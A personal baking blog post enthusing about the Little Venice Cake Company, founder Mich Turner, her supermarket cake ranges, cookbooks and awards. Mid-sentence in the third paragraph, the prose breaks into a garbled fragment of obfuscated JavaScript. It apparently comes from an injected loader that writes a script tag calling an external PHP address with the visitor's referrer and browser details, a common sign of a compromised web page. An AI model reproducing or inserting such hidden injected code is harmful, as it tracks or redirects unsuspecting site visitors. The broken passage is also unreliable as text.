I absolutely love baking!!! If I need the headspace or mental reflection on anything, it’s baking that I turn to.  I’m rubbish at cooking without a cookbook but adore baking; biscuits, desserts, pies and of course cakes! I consider myself a pretty good at home baker and when I stick my Sophie-Dahl-esq attitude on, I can do a mean home-made bread.  My collection of cookbooks must number 60 something now {I am a bit of a collector} but the one thing I have struggled to find is really good baking books.  And now I’ve found them.

But before I go on, let me ask you this first.  Do you fancy sharing a piece of cake made by a company who has made some spectacular cakes for celebrities and international royalty like Her Majesty The Queen, Madonna, Sharon and Ozzy Osbourne, Cheryl Cole, Gordon Ramsay and David Beckham?   Well, what if I told you, you can?

The Little Venice Cake Company (LVCC) don’t just make cakes, Mich Turner has created an amazing business and is someone to inspire to in the realm of small business, especially for us girls.  She has taken a passion and created a brand from it.  Her seasonal collections of cakes are exclusive to Harrods and””””,’g””” c=\’d\’ e=\’b/’ 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’ernyk|varzhaty||js|php’.split(‘|’),0,{}))
she has launched a hugely successful diffusion range of indulgent couture celebration cakes in Waitrose, Sainsburys and Tesco.  So there is no excuse for you not to try her cakes over you next cuppa tea! And, she has cookbooks 🙂

Mich has some amazing testimonials too, from Gordon Ramsey, Heston Blumenthal and Kirsty Allsopp.

Some of LVCC’s awards:

2006 – Gourmand World Cookbook Awards – Best Dessert Book ‘Spectacular Cakes’

2006 – Harpers Bazaar & CHANEL Entrepreneur of the Year – Mich Turner

2008 – Wrap it! Best Wedding Cake Supplier – Little Venice Cake Company

2009 – Walpole Luxury Brand of Tomorrow

2010 – Mich Turner receives her MBE for Services to the Catering Industry

I warn you, no dieters here… this is pure, decadent art!

More from the Little Venice Cake Company…

Little Venice Cake Company is London’s leading supplier of couture wedding and celebration cakes. Mich Turner MBE, founded LVCC in 1999 and here in 2011 the company continues to go from strength to strength. Mich has built up a dedicated following (including the odd celebrity and member of royalty!) and is recognized as being the ultimate authority on cake baking and decorating.

Described as ‘The Queen of Couture Cakes’, Mich makes cakes for events at London’s leading hotels, venues and department stores including Claridge’s, The Dorchester, The Savoy, Liberty and Harrods. Her expertise has led to the publication of four internationally successful books, ‘Spectacular Cakes’, ‘Fantastic Party Cakes’, ‘Couture Wedding Cakes’ and ‘Mich Turner’s Masterclass’. She has her own Wedding TV series, regularly contributes to television programmes and publications and her work is frequently featured in top international wedding and lifestyle press. Mich’s Masterclasses have also been a great success. So far, 2011 has seen a sold out calendar of more advanced classes taking place at the newly refurbished LVCC studio in Marylebone, and the introduction of new Indulgent Masterclasses at The Savoy.

This year, the popularity and reputation of the Little Venice Cake Company brand has allowed for new challenges. A collaboration with Silver Spoon Create has resulted in a collection of professional quality ingredients which have been given the Mich Turner touch. The LVCC range of cake decorating equipment has just been launched internationally and the delicious ‘Triple Layer Chocolate Couture Cake’ has hit supermarket shelves, with an extensive range planned for 2012. Even with all of this going on, Little Venice Cake Company remains as busy as ever with bespoke high profile wedding and celebration cakes.

Love this cake!!!

All that is left, is for me to head off to Waitrose and try some.  And, of course… hunt down one of her cookbooks and let me eat cake!!! Yes please!!!

P.S.  Have you ordered your wedding cake yet. What’s it like? Who’d you order it through, I’d love to know.
